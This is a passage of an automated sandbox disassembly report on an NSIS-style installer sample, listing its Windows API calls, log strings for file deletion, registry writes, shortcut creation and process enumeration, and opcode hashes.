                                                    • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                    • CloseHandle.KERNEL32(?), ref: 004071E6
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                    • API String ID: 1916479912-1189179171
                                                    • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                    • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                    • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                    • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                    APIs
                                                    • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                    • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                    • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                    • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                    • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                    • FindClose.KERNEL32(?), ref: 00406E33
                                                    Strings
                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                    • \*.*, xrefs: 00406D03
                                                    • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                    • API String ID: 2035342205-3294556389
                                                    • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                    • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                    • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                    • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                    APIs
                                                    • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                    • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                    • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                    • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                    • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                    • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                    • API String ID: 3581403547-784952888
                                                    • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                    • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                    • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                    • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                    APIs
                                                    • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                    Strings
                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: CreateInstance
                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                    • API String ID: 542301482-1377821865
                                                    • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                    • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                    • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                    • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: FileFindFirst
                                                    • String ID:
                                                    • API String ID: 1974802433-0
                                                    • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                    • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                    • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                    • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                    APIs
                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                    • lstrlenW.KERNEL32(?), ref: 004063CC
                                                    • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                      • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                    • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                    • GlobalFree.KERNEL32(?), ref: 004064DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                    • API String ID: 20674999-2124804629
                                                    • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                    • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                    • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                    • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                    APIs
                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                    • GetSysColor.USER32(?), ref: 004041AF
                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                    • lstrlenW.KERNEL32(?), ref: 004041D6
                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                      • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                    • SendMessageW.USER32(00000000), ref: 00404251
                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                    • SetCursor.USER32(00000000), ref: 004042D2
                                                    • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                    • SetCursor.USER32(00000000), ref: 004042F6
                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                    • String ID: @%F$N$open
                                                    • API String ID: 3928313111-3849437375
                                                    • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                    • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                    • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                    • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                    APIs
                                                    • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                    • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                    • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                    • wsprintfA.USER32 ref: 00406B4D
                                                    • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                    • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                    Strings
                                                    Similarity
                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                    • String ID: F$%s=%s$NUL$[Rename]
                                                    • API String ID: 565278875-1653569448
                                                    • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                    • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                    • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                    • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                    APIs
                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                    • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                    Strings
                                                    Similarity
                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                    • String ID: F
                                                    • API String ID: 941294808-1304234792
                                                    • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                    • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                    • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                    • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                    APIs
                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                    • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    Strings
                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                    Similarity
                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                    • API String ID: 1641139501-220328614
                                                    • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                    • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                    • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                    • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                    APIs
                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                    Strings
                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                    Similarity
                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                    • String ID: created uninstaller: %d, "%s"
                                                    • API String ID: 3294113728-3145124454
                                                    • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                    • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                    • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                    • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                    APIs
                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                    • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                    Strings
                                                    Similarity
                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                    • API String ID: 3734993849-2769509956
                                                    • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                    • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                    • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                    • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                    • GetSysColor.USER32(00000000), ref: 00403E00
                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                    • SetBkMode.GDI32(?,?), ref: 00403E18
                                                    • GetSysColor.USER32(?), ref: 00403E2B
                                                    • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                    • DeleteObject.GDI32(?), ref: 00403E55
                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                    Similarity
                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                    • String ID:
                                                    • API String ID: 2320649405-0
                                                    • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                    • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                    • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                    • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                    Strings
